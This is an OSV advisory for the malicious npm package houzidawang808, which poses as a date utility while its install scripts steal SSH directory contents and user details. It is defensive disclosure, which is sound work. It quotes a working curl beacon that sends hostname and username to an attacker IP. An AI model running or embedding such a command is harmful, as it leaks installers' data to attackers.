MAL-2026-5732

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/houzidawang808/MAL-2026-5732.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5732

Published

2026-06-13T06:51:37Z

Modified

2026-06-13T07:31:42.677940805Z

Summary

Malicious code in houzidawang808 (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (71d6b96fe99e7f8503cb07df05d6b621dc8e8243fc7288844678d8aff043a654)

The package presents itself as a 'simple date formatting utility' (index.js exports a trivial formatDate wrapper around toLocaleDateString), but ships a postinstall.js that runs automatically on npm install. The postinstall script reads the contents of the installer's ~/.ssh directory via fs.readdirSync, collects os.userInfo() username and platform information, and POSTs the data to https://124.221.154.135/post — a hardcoded bare-IP destination with no documented purpose. Chinese-language comments in the file explicitly describe it as SSH-key theft and C2 exfiltration. The package.json additionally declares a build script curl http://124.221.154.135//pre?h=$(hostname)&u=$(whoami) that beacons hostname/username over plain HTTP to the same attacker IP, confirming the infrastructure. The benign date-utility facade is a cover story for credential-harvesting on installer machines.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006300",
            "versions": [
                "1.0.0"
            ],
            "sha256": "71d6b96fe99e7f8503cb07df05d6b621dc8e8243fc7288844678d8aff043a654",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T06:51:37Z",
            "import_time": "2026-06-13T07:25:38.100755621Z"
        }
    ]
}

References

https://www.npmjs.com/package/houzidawang808/v/1.0.0

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / houzidawang808

Package

Name: houzidawang808; View open source insights on deps.dev
Purl: pkg:npm/houzidawang808

Affected ranges

Affected versions

1.*

1.0.0

Database specific

cwes

[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]

indicators

{
    "evidence_files": [
        {
            "path": "postinstall.js",
            "sha256": "01e2ae4c999c97c0deac72c7c36bbda5c0d81a95273d4cc5e7dd1dc6dc4596db",
            "tlsh": "033161d148f9ce304f3583952762c62af606fb23a106c640f7d80bea2fb299485d1ced"
        },
        {
            "path": "package.json",
            "sha256": "d828569a33a47d796f060d939f837e86c06d45068ea6ebdd29d0e28e08892e5a",
            "tlsh": "90e07d256e24d8231bf0c6516d744b17b9105f2f127c0c4bb173310861979651469701"
        }
    ],
    "package_integrity": [
        {
            "filename": "houzidawang808-1.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-V3uE+iIR3fj9kGSq1tn6emy364j1wreG9w/vdQPNhqDMoIucFW401Yz+RhYi+RfmaZrA+qgcAvygnZWqj4mJkA==",
                "sha1": "c383a48cc471e749f176a447f1e8b399be26fb59"
            }
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/houzidawang808/MAL-2026-5732.json"